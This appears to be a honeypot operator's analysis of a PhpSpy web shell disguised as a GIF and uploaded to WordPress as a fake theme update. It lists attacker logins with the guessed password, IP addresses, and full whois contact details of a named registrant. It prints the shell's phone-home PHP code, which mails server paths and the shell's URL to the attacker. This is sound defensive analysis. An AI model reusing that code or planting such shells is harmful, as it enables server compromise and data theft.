PhpSpy web shell disguised as a GIF file. The file command identifies
the PHP file as GIF image data, version 89a, 8251 x 2573.
Downloaded as a update to the "twentytwelve" theme.
p0f3 identifies the downloader as "Windows NT kernel".
Downloaded via a fake theme update - the WordPress honey pot implements some WordPress features to allow file uploads.
The downloader had logged in to WordPress via a previously guessed password.
2017-11-30T12:24:22-07:00 95.14.68.119 admin
First successful guess of that userID/password:
2017-11-21T16:26:28-07:00 91.200.12.75 admin adminadmin
And isn't this clever:
1059 % nslookup 91.200.12.75
75.12.200.91.in-addr.arpa name = seosemcms14.example.com.
Next login with those credentials:
2017-11-23T15:51:29-07:00 115.28.154.44 admin adminadmin from previous successful guess
This particular example is part of a 59 access campaign that ended up "installing" the malware 4 times.
My Apache access_log file (archive.php.accesses in this repo) shows
that the downloader tried to activate archive.php during the campaign.
I believe that the URLs tried would just get my fake WSO web shell,
so probably a honey pot fail, there.
95.14.68.119 → 95.14.68.119.dynamic.ttnet.com.tr
95.14.0.0/17 is in AS9121 assigned to TurkTelekom
Registrant Name: Baran Delibas
Registrant Organization: Delibas Ltd Sti.
Registrant Street: Bismil, Merkez
Registrant Street: Delibas Bilisim LTD Sti.
Registrant City: Bismil
Registrant State/Province: Diyarbakir
Registrant Postal Code: 21500
Registrant Country: TR
Registrant Phone: +90.5394925905
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: Amadeus155@hotmail.com
Registry Admin ID: Not Available From Registry
Admin Name: Baran Delibas
Admin Organization: Delibas Ltd Sti.
Admin Street: Bismil, Merkez
Admin Street: Delibas Bilisim LTD Sti.
Admin City: Bismil
Admin State/Province: Diyarbakir
Admin Postal Code: 21500
Admin Country: TR
Admin Phone: +90.5394925905
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: Amadeus155@hotmail.com
The HTTP headers show that the downloader has "tr-Tr", Turkish, set as its preferred language.
- Hand edit
95.14.68.119WiBbOqAyktOt7H316j48NQAAAAUfileintodc1.php, mostly changingevaltoprint - Execute
php dc1.php > dc2.php
Looks like dc2.php is its final form.
PHP code mentions "http://www.dcvi.net", which is 94.23.166.29. whois says dcvi.net
is registered to one Lu JunHua of Shanghai. Wow, what a tangled web.
After de-fanging the PHP, execution and examination in a web browser shows that ultimately, this is an instance of the PhpSpy web shell, slightly customized to have some Turkish labels on things.
I had to change a call to deprecated function eregi() to stristr() to
get this to run. eregi() was deprecated in PHP 5.3, and removed in 7.0.
That means that anyone keeping PHP itself up-to-date doesn't really need
to worry about this one.
The code has a piece of PHP that phones home:
<?php
$kime="amadeus155@hotmail.com";
$baslik="SadrazaM Server Avcisi V1.0";
$EL_MuHaMMeD="Dosya Yolu : ".$_SERVER['DOCUMENT_ROOT']."\r\n";
$EL_MuHaMMeD.="Server Admin : ".$_SERVER['SERVER_ADMIN']."\r\n";
$EL_MuHaMMeD.="Server isletim sistemi : ".$_SERVER['SERVER_SOFTWARE']."\r\n";
$EL_MuHaMMeD.="Shell Link : http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\r\n";
$EL_MuHaMMeD.="Avlanan Site : " .$_SERVER['HTTP_HOST']."\r\n";
mail($kime, $baslik, $EL_MuHaMMeD);
?>
This is the same email address as the "Admin" and "Tech" email contacts in
the whois info for the IP address.